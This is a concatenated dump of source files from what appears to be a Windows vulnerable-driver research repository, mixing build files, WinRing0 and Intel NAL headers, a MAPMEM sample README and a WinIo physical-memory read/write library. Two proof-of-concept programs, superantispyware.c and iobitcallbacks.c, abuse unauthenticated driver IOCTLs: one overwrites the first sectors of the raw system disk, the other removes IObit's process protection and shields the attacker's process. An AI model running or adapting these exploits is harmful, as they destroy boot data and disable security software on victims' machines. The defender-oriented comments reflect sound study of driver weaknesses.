13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {5baab34b-228c-4014-a376-ce5e8f112526}
18 |
19 |
20 |
21 |
22 | Source Files
23 |
24 |
25 | minirtl
26 |
27 |
28 | Source Files
29 |
30 |
31 | minirtl
32 |
33 |
34 | minirtl
35 |
36 |
37 | minirtl
38 |
39 |
40 | minirtl
41 |
42 |
43 | minirtl
44 |
45 |
46 |
47 |
48 | Source Files
49 |
50 |
51 |
52 |
53 | Header Files
54 |
55 |
56 | Header Files
57 |
58 |
59 | Header Files
60 |
61 |
62 | Header Files
63 |
64 |
65 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/OlsDef.h:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #pragma once
11 |
//-----------------------------------------------------------------------------
//
// DLL Status Code
//
// Values 6-8 are not assigned in this header.
//
//-----------------------------------------------------------------------------

#define OLS_DLL_NO_ERROR 0
#define OLS_DLL_UNSUPPORTED_PLATFORM 1
#define OLS_DLL_DRIVER_NOT_LOADED 2
#define OLS_DLL_DRIVER_NOT_FOUND 3
#define OLS_DLL_DRIVER_UNLOADED 4
#define OLS_DLL_DRIVER_NOT_LOADED_ON_NETWORK 5
#define OLS_DLL_UNKNOWN_ERROR 9

//-----------------------------------------------------------------------------
//
// Driver Type
//
//-----------------------------------------------------------------------------

#define OLS_DRIVER_TYPE_UNKNOWN 0
#define OLS_DRIVER_TYPE_WIN_9X 1
#define OLS_DRIVER_TYPE_WIN_NT 2
#define OLS_DRIVER_TYPE_WIN_NT4 3 // Obsolete
#define OLS_DRIVER_TYPE_WIN_NT_X64 4
#define OLS_DRIVER_TYPE_WIN_NT_IA64 5 // Reserved

//-----------------------------------------------------------------------------
//
// PCI Error Code
//
// These are long literals with the top bits set, unlike the small status
// codes above, so the two value ranges cannot be confused.
//
//-----------------------------------------------------------------------------

#define OLS_ERROR_PCI_BUS_NOT_EXIST (0xE0000001L)
#define OLS_ERROR_PCI_NO_DEVICE (0xE0000002L)
#define OLS_ERROR_PCI_WRITE_CONFIG (0xE0000003L)
#define OLS_ERROR_PCI_READ_CONFIG (0xE0000004L)
49 |
50 | //-----------------------------------------------------------------------------
51 | //
52 | // Support Macros
53 | //
54 | //-----------------------------------------------------------------------------
55 |
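// PCI device address layout used by these macros:
//   bits 15..8  bus number (8 bits)
//   bits  7..3  device number (5 bits)
//   bits  2..0  function number (3 bits)
//
// Every macro argument and every whole expansion is parenthesized so the
// macros keep their meaning when the argument is an expression (a | b) or
// when the result is used inside a larger expression (== x, & mask).

// Bus Number, Device Number and Function Number to PCI Device Address
#define PciBusDevFunc(Bus, Dev, Func) ((((Bus)&0xFF)<<8) | (((Dev)&0x1F)<<3) | ((Func)&7))
// PCI Device Address to Bus Number
#define PciGetBus(address) (((address)>>8) & 0xFF)
// PCI Device Address to Device Number
#define PciGetDev(address) (((address)>>3) & 0x1F)
// PCI Device Address to Function Number
#define PciGetFunc(address) ((address)&7)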
64 |
--------------------------------------------------------------------------------
/source/SecTrash/superantispyware.c:
--------------------------------------------------------------------------------
1 | #pragma warning(disable: 4005)
2 |
3 | #include
4 | #include
5 | #include
6 | #include "ntos.h"
7 |
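/*
 * Thin synchronous wrapper around NtDeviceIoControlFile.
 *
 * DeviceHandle       - open handle to the target device.
 * IoControlCode      - control code forwarded unchanged.
 * InputBuffer/Length - optional request buffer and its size in bytes.
 * OutputBuffer/Length - optional reply buffer and its size in bytes.
 *
 * No event, APC routine or APC context is supplied. The NTSTATUS of the
 * native call is returned as is; the IO_STATUS_BLOCK contents are discarded,
 * so callers never learn how many bytes the driver reported.
 */
NTSTATUS CallDriver(
    _In_ HANDLE DeviceHandle,
    _In_ ULONG IoControlCode,
    _In_opt_ PVOID InputBuffer,
    _In_opt_ ULONG InputBufferLength,
    _In_opt_ PVOID OutputBuffer,
    _In_opt_ ULONG OutputBufferLength)
{
    IO_STATUS_BLOCK ioStatus;

    return NtDeviceIoControlFile(DeviceHandle,
        NULL,
        NULL,
        NULL,
        &ioStatus,
        IoControlCode,
        InputBuffer,
        InputBufferLength,
        OutputBuffer,
        OutputBufferLength);
}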
31 |
/*
 * Request buffer passed as input to IOCTL_SAS_CALLDRIVER.
 * DeviceName is 2048 WCHARs = 0x1000 bytes, which is where the +0x1000
 * offset of the next field comes from. The +0x1008 and +0x1010 offsets
 * hold only when SIZE_T is 8 bytes, i.e. on a 64-bit build.
 * Every field is chosen by the caller: the name of the device to act on,
 * the offset on it, and a user-mode data pointer with its length.
 */
#pragma pack(push, 1)
typedef struct _CALL_DRV {
    WCHAR DeviceName[2048];
    LARGE_INTEGER StartingOffset; // +0x1000
    SIZE_T DataSize; // +0x1008
    PVOID DataPtr; // +0x1010
} CALL_DRV, * PCALL_DRV;
#pragma pack(pop)

/* Not referenced elsewhere in this file; looks like a leftover used to
   check the DataPtr offset against the +0x1010 note above. */
ULONG u = FIELD_OFFSET(CALL_DRV, DataPtr);

/*
 * The control code is declared METHOD_BUFFERED with FILE_ANY_ACCESS, so the
 * I/O manager itself demands no read or write right on the handle for this
 * request. Any restriction has to come from the device object's security
 * descriptor or from checks inside the driver's dispatch routine.
 */
#define SAS_DEVICE 0x9C40
#define IOCTL_SAS_CALLDRIVER CTL_CODE(SAS_DEVICE, 0x850, METHOD_BUFFERED, FILE_ANY_ACCESS)
45 |
/*
 * Demonstration of the SASKUTIL driver interface. It opens the device from
 * user mode and issues IOCTL_SAS_CALLDRIVER in a loop with a request that
 * names a raw disk device object.
 *
 * Review notes for defenders:
 *  - Nothing here authenticates the caller to the driver. Whether the
 *    request is honoured depends on the device object's ACL and on the
 *    validation in the driver's IOCTL handler, neither of which is visible
 *    in this file.
 *  - The target device name, the offset and the data pointer are all
 *    caller-controlled fields of CALL_DRV. A driver offering such a
 *    pass-through has to restrict who may open the device and which
 *    targets and offsets it accepts.
 *  - Opening \\.\SASKUTIL from a process that is not part of the product
 *    is the observable event to alert on.
 */
int main()
{
    NTSTATUS ntStatus;
    CALL_DRV request;

    HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\SASKUTIL"),
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (deviceHandle == INVALID_HANDLE_VALUE) {
        printf_s("[!] Unable to open device\r\n");
        /* Only non-debug builds stop here; a _DEBUG build goes on with an
           invalid handle. */
#ifndef _DEBUG
        return -1;
#endif
    }
    else {
        printf_s("[+] SASKUTIL device opened\r\n");
    }

    system("pause");

    WCHAR writeData[512];

    /* 512 WCHARs = 1024 bytes of a fixed 0xAB marker pattern. */
    memset(&writeData, 0xAB, sizeof(writeData));
    RtlSecureZeroMemory(&request, sizeof(request));

    wcscpy_s(request.DeviceName, L"\\Device\\Harddisk0\\DR0");
    request.DataSize = sizeof(writeData);
    request.DataPtr = &writeData;

    /* 65 requests, the offset advancing by 512 bytes each time. The result
       of every call is printed but never acted on. */
    for (ULONG i = 0; i < 65; i++) {

        request.StartingOffset.LowPart = (i * 512);

        ntStatus = CallDriver(deviceHandle,
            IOCTL_SAS_CALLDRIVER,
            &request,
            sizeof(CALL_DRV),
            NULL,
            0);

        printf_s("[+] CallDriver NTSTATUS 0x%lX\r\n", ntStatus);
    }

    CloseHandle(deviceHandle);
}
96 |
--------------------------------------------------------------------------------
/source/IntelNal/inc/linux/linuxdriverdevice_i.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Intel QV Linux kernel driver
3 | * Copyright (c) 1999 - 2013, Intel Corporation.
4 | *
5 | * This program is free software; you can redistribute it and/or modify it
6 | * under the terms and conditions of the GNU General Public License,
7 | * version 2, as published by the Free Software Foundation.
8 | *
9 | * This program is distributed in the hope it will be useful, but WITHOUT
10 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
11 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
12 | * more details.
13 | *
14 | * You should have received a copy of the GNU General Public License along with
15 | * this program; if not, write to the Free Software Foundation, Inc.,
16 | * 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
17 | *
18 | */
19 |
20 | /*
21 | * Module Name:
22 | * linuxdriverdevice_i.h
23 | *
24 | * Abstract:
25 | * This file contains Linux Specific OS functions that are required
26 | * to correctly communicate with a device in Linux.
27 | */
28 |
29 |
30 | #ifndef _LINUXDRIVERDEVICE_I_H_
31 | #define _LINUXDRIVERDEVICE_I_H_
32 |
33 | #include
34 | #include
35 |
/*
 * Takes a device location and a lock/unlock flag and returns a BOOLEAN.
 * NOTE(review): presumably TRUE means the in-use state was changed -
 * confirm against the implementation.
 */
BOOLEAN
_NalMarkAdapterInUse(
    IN NAL_DEVICE_LOCATION NalDevice,
    IN BOOLEAN Lock
    );

/* Per-device OS-specific state; on Linux it holds only a reference count. */
typedef struct _NAL_OS_SPECIFIC_DEVICE
{
    UINT32 ReferenceCount;
} NAL_OS_SPECIFIC_DEVICE;

/*
 * OS-layer port and register accessors. On Linux each one drops its first
 * argument (a) and forwards to the generic Nal* routine, so nothing at this
 * layer ties the access to a particular adapter.
 * NOTE(review): any checking of the port number or register address has to
 * happen inside the Nal* routines themselves.
 */
#define _NalReadPortOs8(a,p) NalReadPort8(p)
#define _NalReadPortOs16(a,p) NalReadPort16(p)
#define _NalReadPortOs32(a,p) NalReadPort32(p)
#define _NalWritePortOs8(a,p,v) NalWritePort8(p,v)
#define _NalWritePortOs16(a,p,v) NalWritePort16(p,v)
#define _NalWritePortOs32(a,p,v) NalWritePort32(p,v)
#define _NalReadRegisterOs8(a,d) NalReadRegister8(d)
#define _NalReadRegisterOs16(a,d) NalReadRegister16(d)
#define _NalReadRegisterOs32(a,d) NalReadRegister32(d)
#define _NalWriteRegisterOs8(a,d,v) NalWriteRegister8(d,v)
#define _NalWriteRegisterOs16(a,d,v) NalWriteRegister16(d,v)
#define _NalWriteRegisterOs32(a,d,v) NalWriteRegister32(d,v)
59 |
/*
 * Allocates ByteCount bytes for the PCI device PDev with the requested
 * alignment. The kernel address is the return value and the matching
 * physical address is written to *PhysicalAddress.
 * NamedLocator and LineNumber identify the call site.
 * NOTE(review): presumably NULL is returned on failure - confirm.
 */
KVOID*
_NalAllocateMemoryNonPagedPci(
    IN KVOID* PDev,
    IN UINT32 ByteCount,
    IN UINT32 Alignment,
    OUT NAL_PHYSICAL_ADDRESS* PhysicalAddress,
    IN CHAR* NamedLocator,
    IN UINT32 LineNumber
    );

/*
 * Releases a buffer described by its kernel address, physical address and
 * size. The caller supplies all three values.
 * NOTE(review): unlike the allocator above, this name has no leading
 * underscore - confirm which spelling the implementation defines.
 */
VOID
NalFreeMemoryNonPagedPci(
    IN KVOID* PDev,
    IN KVOID* Address,
    IN NAL_PHYSICAL_ADDRESS PhysicalAddress,
    IN UINT32 Size
    );
77 |
78 | #endif
79 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/README.TXT:
--------------------------------------------------------------------------------
1 | Build & Run Instructions:
2 | -------------------------
3 |
4 | The MAPMEM sample demonstrates how a kernel-mode device driver
5 | can utilize the Zw*MapViewOfSection APIs to (un)map a physical
6 | address into a user-mode process's address space.
7 |
8 |
9 | NOTE: Microsoft does not recommend architecting Win32 applications
10 | such that they read/write directly on physical memory.
11 | User-mode applications are not considered "trusted" parts
12 | of the system, and giving hardware access to untrusted
13 | modules seriously impairs system security.
14 |
15 | We encourage developers who need hardware access to locate
16 | their hardware I/O code in a device driver, and have their
17 | Win32 app communicate its requests to the driver via the
18 | DeviceIoControl() API.
19 |
20 |
21 | This sample is composed of two parts, a Windows NT kernel-mode
22 | device driver (MAPMEM) and a Win32 test application (MAPTEST).
23 |
24 |
25 | The Win32 portion contains a file, MAPTEST.C, which attempts to
26 | obtain a handle to MAPMEM & send it IOCTLs. The executable is built
27 | using the Windows NT SDK. First update the environment and path by
28 | running <SDK root>\setenv.bat. Then change to the directory where
29 | you have the C source code and the makefile. Type "nmake /f maptest.mak"
30 | to compile the Win32 program, MAPTEST.EXE.
31 |
32 |
33 | The kernel driver portion contains the driver source code, MAPMEM.C
34 | and a text file used to configure your registry so that the driver
35 | can be loaded. The driver is built using the Windows NT DDK.
36 |
37 | To build the driver:
38 |
39 |
40 | 1. Assuming you have run <SDK root>\setenv.bat and
41 | <DDK root>\setenv.bat, build the driver by typing:
42 |
43 | build -cef
44 |
45 | (If there are any errors have a look at the build.log, build.err,
46 | and build.wrn files to get an idea of what went wrong.)
47 |
48 |
49 | 2. Copy the newly built driver, <DDK root>\lib\*\MAPMEM.SYS to the
50 | <Windows root>\system32\drivers\ directory, i.e.:
51 |
52 | copy \ntddk\lib\i386\free\mapmem.sys c:\winnt\system32\drivers\
53 |
54 |
55 | 3. Update the registry by running regini.exe on the mapmem.ini
56 | file, i.e.:
57 |
58 | regini mapmem.ini
59 |
60 | This adds a MAPMEM driver key under the HKEY_LOCAL_MACHINE\
61 | SYSTEM\CurrentControlSet\Services tree in the registry. You
62 | can verify this by starting REGEDIT.EXE and looking in the
63 | appropriate place.
64 |
65 |
66 | 4. Reboot.
67 |
68 |
69 | 5. Type:
70 |
71 | net start mapmem
72 |
73 | ...and then execute MAPTEST.EXE.
74 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/vxd/Makefile:
--------------------------------------------------------------------------------
1 | #-----------------------------------------------------------------------------
2 | # Author : hiyohiyo
3 | # Mail : hiyohiyo@crystalmark.info
4 | # Web : http://openlibsys.org/
5 | # License : The modified BSD license
6 | #
7 | # Copyright 2007 hiyohiyo, All rights reserved.
8 | #-----------------------------------------------------------------------------
9 | #
10 | # How to build on Windows XP SP1 DDK (Win Me Free Build Environment)
11 | #
12 | # 0. Get Windows XP SP1 DDK from MSDN
13 | # 1. Install Windows XP SP1 DDK with Win Me support
14 | # 2. Open "Win Me Free Build Environment"
15 | # 3. cd (WinRing0)\source\dll\vxd
16 | # 4. nmake
17 | #
18 | # Compile Options
19 | #_OPEN_LIB_SYS=
20 |
21 | !ifdef _OPEN_LIB_SYS
22 | VXDFILE = OpenLibSys.vxd
23 | !else
24 | VXDFILE = WinRing0.vxd
25 | !endif
26 |
27 | OBJDIR = bin
28 | VXDWRAPSDIR = $(DDKROOT)\lib\win_me\
29 |
30 | RC16 = $(DDKROOT)\bin\win_me\bin16\rc
31 | ML = $(DDKROOT)\bin\win_me\bin\ml
32 | CL = $(DDKROOT)\bin\x86\cl
33 | LINK = $(DDKROOT)\bin\x86\link
34 |
35 | !ifdef DEBUG
36 | DDEBUG =-DDEBLEVEL=1 -DDEBUG
37 | !else
38 | DDEBUG =-DDEBLEVEL=0
39 | !endif
40 |
41 | CFLAGS = -Zdp -Gs -c -DIS_32 $(DDEBUG)
42 | LFLAGS = -machine:i386 -debug:none kernel32.lib
43 | AFLAGS = -coff -DBLD_COFF -DIS_32 -W2 -Zd -c -Cx -DMASM6
44 |
45 | all: direxist $(OBJDIR)\OpenLS.vxd
46 |
47 | direxist:
48 | if not exist $(OBJDIR)\nul md $(OBJDIR)
49 |
50 | $(OBJDIR)\OpenLS.res: OpenLS.rc
51 | $(RC16) -Fo$@ -r OpenLS.rc
52 |
53 | $(OBJDIR)\OpenLS.obj: OpenLS.c
54 | $(CL) $(CFLAGS) -Fo$@ %s
55 |
56 | $(OBJDIR)\ctrl.obj: ctrl.asm
57 | $(ML) $(AFLAGS) -Fo$@ %s
58 |
59 | $(OBJDIR)\OpenLS.vxd: $(OBJDIR)\OpenLS.obj $(OBJDIR)\ctrl.obj\
60 | $(OBJDIR)\OpenLS.res OpenLS.def
61 | echo >NUL @<
9 | #include
10 | #include "phys32.h"
11 | #include "..\drv\winio_nt.h"
12 | #include "winio.h"
13 |
14 |
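// Ask the WinIo driver to map the physical range described by PhysStruct
// into the calling process.
//
// PhysStruct is both the request and the reply buffer of
// IOCTL_WINIO_MAPPHYSTOLIN. On success the linear address is read back from
// PhysStruct.pvPhysMemLin and returned. Returns NULL when the library is not
// initialised or the IOCTL fails.
//
// The physical address and size are forwarded exactly as the caller supplied
// them; no range check is made on this side, so any restriction on which
// memory may be mapped has to be enforced by the driver.
PBYTE _stdcall MapPhysToLin(tagPhysStruct &PhysStruct)
{
    DWORD dwBytesReturned;

    // The return type is a pointer, so every failure path yields NULL.
    if (!IsWinIoInitialized)
        return NULL;

    if (!DeviceIoControl(hDriver, IOCTL_WINIO_MAPPHYSTOLIN, &PhysStruct,
        sizeof(tagPhysStruct), &PhysStruct, sizeof(tagPhysStruct),
        &dwBytesReturned, NULL))
    {
        return NULL;
    }

    return (PBYTE)PhysStruct.pvPhysMemLin;
}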
32 |
33 |
// Release a mapping previously set up through the driver.
//
// PhysStruct is sent as the input buffer of IOCTL_WINIO_UNMAPPHYSADDR; no
// output buffer is used. Returns true only when the library is initialised
// and the IOCTL succeeds.
bool _stdcall UnmapPhysicalMemory(tagPhysStruct &PhysStruct)
{
    DWORD cbReturned;

    if (IsWinIoInitialized &&
        DeviceIoControl(hDriver, IOCTL_WINIO_UNMAPPHYSADDR, &PhysStruct,
            sizeof(tagPhysStruct), NULL, 0, &cbReturned, NULL))
    {
        return true;
    }

    return false;
}
51 |
52 | // Support functions
53 |
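// Read one 32-bit value from a physical address.
//
// pbPhysAddr - physical address, carried in a pointer-typed parameter.
// pdwPhysVal - receives the value; must not be NULL.
//
// Maps 4 bytes through MapPhysToLin, copies the DWORD out and unmaps again.
// Returns false when the library is not initialised, pdwPhysVal is NULL or
// the mapping fails. The result of the unmap call is not reported.
//
// The address is taken from the caller unchecked; which physical memory is
// reachable is decided entirely by the driver behind MapPhysToLin.
bool _stdcall GetPhysLong(PBYTE pbPhysAddr, PDWORD pdwPhysVal)
{
    PDWORD pdwLinAddr;
    // Zero the request so fields not set below are not passed to the driver
    // as uninitialised stack contents.
    tagPhysStruct PhysStruct = {};

    if (!IsWinIoInitialized)
        return false;

    // Reject a missing output pointer before anything is mapped.
    if (pdwPhysVal == NULL)
        return false;

    if (g_Is64BitOS)
    {
        PhysStruct.pvPhysAddress = (DWORD64)pbPhysAddr;
    }
    else
    {
        // Avoid sign extension issues
        PhysStruct.pvPhysAddress = (DWORD64)(DWORD32)pbPhysAddr;
    }

    PhysStruct.dwPhysMemSizeInBytes = 4;

    pdwLinAddr = (PDWORD)MapPhysToLin(PhysStruct);

    if (pdwLinAddr == NULL)
        return false;

    *pdwPhysVal = *pdwLinAddr;

    UnmapPhysicalMemory(PhysStruct);

    return true;
}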
85 |
86 |
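// Write one 32-bit value to a physical address.
//
// pbPhysAddr - physical address, carried in a pointer-typed parameter.
// dwPhysVal  - value to store.
//
// Maps 4 bytes through MapPhysToLin, stores the DWORD and unmaps again.
// Returns false when the library is not initialised or the mapping fails.
// The result of the unmap call is not reported.
//
// The address is taken from the caller unchecked; which physical memory is
// writable is decided entirely by the driver behind MapPhysToLin.
bool _stdcall SetPhysLong(PBYTE pbPhysAddr, DWORD dwPhysVal)
{
    PDWORD pdwLinAddr;
    // Zero the request so fields not set below are not passed to the driver
    // as uninitialised stack contents.
    tagPhysStruct PhysStruct = {};

    if (!IsWinIoInitialized)
        return false;

    if (g_Is64BitOS)
    {
        PhysStruct.pvPhysAddress = (DWORD64)pbPhysAddr;
    }
    else
    {
        // Avoid sign extension issues
        PhysStruct.pvPhysAddress = (DWORD64)(DWORD32)pbPhysAddr;
    }

    PhysStruct.dwPhysMemSizeInBytes = 4;

    pdwLinAddr = (PDWORD)MapPhysToLin(PhysStruct);

    if (pdwLinAddr == NULL)
        return false;

    *pdwLinAddr = dwPhysVal;

    UnmapPhysicalMemory(PhysStruct);

    return true;
}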
118 |
--------------------------------------------------------------------------------
/source/SecTrash/iobitcallbacks.c:
--------------------------------------------------------------------------------
1 | #pragma warning(disable: 4005)
2 |
3 | #include
4 | #include
5 | #include
6 | #include "ntos.h"
7 |
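/*
 * Thin synchronous wrapper around NtDeviceIoControlFile.
 *
 * DeviceHandle       - open handle to the target device.
 * IoControlCode      - control code forwarded unchanged.
 * InputBuffer/Length - optional request buffer and its size in bytes.
 * OutputBuffer/Length - optional reply buffer and its size in bytes.
 *
 * No event, APC routine or APC context is supplied. The NTSTATUS of the
 * native call is returned as is; the IO_STATUS_BLOCK contents are discarded,
 * so callers never learn how many bytes the driver reported.
 */
NTSTATUS CallDriver(
    _In_ HANDLE DeviceHandle,
    _In_ ULONG IoControlCode,
    _In_opt_ PVOID InputBuffer,
    _In_opt_ ULONG InputBufferLength,
    _In_opt_ PVOID OutputBuffer,
    _In_opt_ ULONG OutputBufferLength)
{
    IO_STATUS_BLOCK ioStatus;

    return NtDeviceIoControlFile(DeviceHandle,
        NULL,
        NULL,
        NULL,
        &ioStatus,
        IoControlCode,
        InputBuffer,
        InputBufferLength,
        OutputBuffer,
        OutputBufferLength);
}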
31 |
/*
 * Input buffer for the second IOCTL issued by main(). Only Pid1 and Pid2
 * are filled in by this file; the remaining fields stay zero.
 * The process identifiers are carried in HANDLE-sized fields.
 * NOTE(review): the meaning of Value1, Value2 and Spare is not visible
 * here; the 392-byte tail presumably pads the structure to the size the
 * driver expects - confirm.
 */
typedef struct _CALL_DRV {
    ULONG Value1;
    ULONG Value2;
    HANDLE Pid1;
    HANDLE Pid2;
    BYTE Spare[392];
} CALL_DRV, * PCALL_DRV;
39 |
/*
 * Demonstration of the ImfObCallback driver interface. It opens the device
 * from user mode and sends two control codes: one with no input at all, and
 * one carrying two process identifiers.
 *
 * Review notes for defenders:
 *  - The caller presents no credential or proof of identity with either
 *    request. Whether the driver verifies who is asking cannot be seen
 *    from this file; the flow relies on it not doing so.
 *  - A protection driver has to restrict its device object to the
 *    product's own processes and validate the requester in the IOCTL
 *    handler. Otherwise any process able to open the device can change
 *    what is protected.
 *  - Opening \\.\ImfObCallback from a process that is not part of the
 *    product is the observable event to alert on.
 */
int main()
{
    NTSTATUS ntStatus;

    HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\ImfObCallback"),
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (deviceHandle == INVALID_HANDLE_VALUE) {
        printf_s("[!] Unable to open device\r\n");
        /* Only non-debug builds stop here; a _DEBUG build goes on with an
           invalid handle. */
#ifndef _DEBUG
        return -1;
#endif
    }
    else {
        printf_s("[+] ImfObCallback device opened\r\n");
    }

    //
    // Remove protection from IOBit processes.
    // IMF.exe
    // IMFCore.exe
    //
    // The request carries no input and no output buffer.
    //

    ntStatus = CallDriver(deviceHandle,
        0x22200C,
        NULL,
        0,
        NULL,
        0);

    if (NT_SUCCESS(ntStatus)) {
        printf_s("[~] Protection removed\r\n");
    }
    else {
        printf_s("[~] Error (NTSTATUS 0x%lx)\r\n", ntStatus);
    }

    system("pause");

    //
    // Protect ourself.
    //
    // The request names the current process and the process that owns the
    // desktop window.
    //

    CALL_DRV request;
    DWORD procId1 = GetCurrentProcessId(), procId2;

    GetWindowThreadProcessId(GetDesktopWindow(), &procId2); //anything else

    RtlZeroMemory(&request, sizeof(request));

    request.Pid1 = UlongToHandle(procId1);
    request.Pid2 = UlongToHandle(procId2);

    ntStatus = CallDriver(deviceHandle,
        0x222008,
        &request,
        sizeof(request),
        NULL,
        0);

    if (NT_SUCCESS(ntStatus)) {
        printf_s("[~] Protection installed, try to kill me\r\n");
    }
    else {
        printf_s("[~] Error (NTSTATUS 0x%lx)\r\n", ntStatus);
    }

    system("pause");

    CloseHandle(deviceHandle);
}
116 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {58d1c9d3-a7e5-4f1a-b441-007441745fe5}
18 | False
19 |
20 |
21 |
22 |
23 | Source Files
24 |
25 |
26 | Source Files
27 |
28 |
29 | Source Files
30 |
31 |
32 | Generated Files
33 |
34 |
35 | Source Files
36 |
37 |
38 |
39 |
40 | Header Files
41 |
42 |
43 | Header Files
44 |
45 |
46 | Header Files
47 |
48 |
49 | Header Files
50 |
51 |
52 | Generated Files
53 |
54 |
55 | Header Files
56 |
57 |
58 |
59 |
60 | Resource Files
61 |
62 |
63 |
64 |
65 | Resource Files
66 |
67 |
68 | Source Files
69 |
70 |
71 | Resource Files
72 |
73 |
74 |
75 |
76 | Source Files
77 |
78 |
79 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiScan.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.136
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiScanServer", "AmsiServer\AmsiScan\AmsiScan.vcxproj", "{D131A205-F090-4CF5-8441-32074FE5398E}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiScanPS", "AmsiServer\AmsiScanPS\AmsiScanPS.vcxproj", "{19E4CA54-321F-481D-A457-48C4E3F3E85C}"
9 | ProjectSection(ProjectDependencies) = postProject
10 | {D131A205-F090-4CF5-8441-32074FE5398E} = {D131A205-F090-4CF5-8441-32074FE5398E}
11 | EndProjectSection
12 | EndProject
13 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiClient", "AmsiClient\AmsiClient.vcxproj", "{CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}"
14 | EndProject
15 | Global
16 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
17 | Debug|x64 = Debug|x64
18 | Debug|x86 = Debug|x86
19 | Release|x64 = Release|x64
20 | Release|x86 = Release|x86
21 | EndGlobalSection
22 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
23 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x64.ActiveCfg = Debug|x64
24 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x64.Build.0 = Debug|x64
25 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x86.ActiveCfg = Debug|Win32
26 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x86.Build.0 = Debug|Win32
27 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x64.ActiveCfg = Release|x64
28 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x64.Build.0 = Release|x64
29 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x86.ActiveCfg = Release|Win32
30 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x86.Build.0 = Release|Win32
31 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Debug|x64.ActiveCfg = Debug|x64
32 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Debug|x86.ActiveCfg = Debug|Win32
33 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Release|x64.ActiveCfg = Release|x64
34 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Release|x86.ActiveCfg = Release|Win32
35 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x64.ActiveCfg = Debug|x64
36 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x64.Build.0 = Debug|x64
37 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x86.ActiveCfg = Debug|Win32
38 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x86.Build.0 = Debug|Win32
39 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x64.ActiveCfg = Release|x64
40 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x64.Build.0 = Release|x64
41 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x86.ActiveCfg = Release|Win32
42 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x86.Build.0 = Release|Win32
43 | EndGlobalSection
44 | GlobalSection(SolutionProperties) = preSolution
45 | HideSolutionNode = FALSE
46 | EndGlobalSection
47 | GlobalSection(ExtensibilityGlobals) = postSolution
48 | SolutionGuid = {C3FB4B87-8F9C-4BDC-BE98-48B9ACE36E15}
49 | EndGlobalSection
50 | EndGlobal
51 |
--------------------------------------------------------------------------------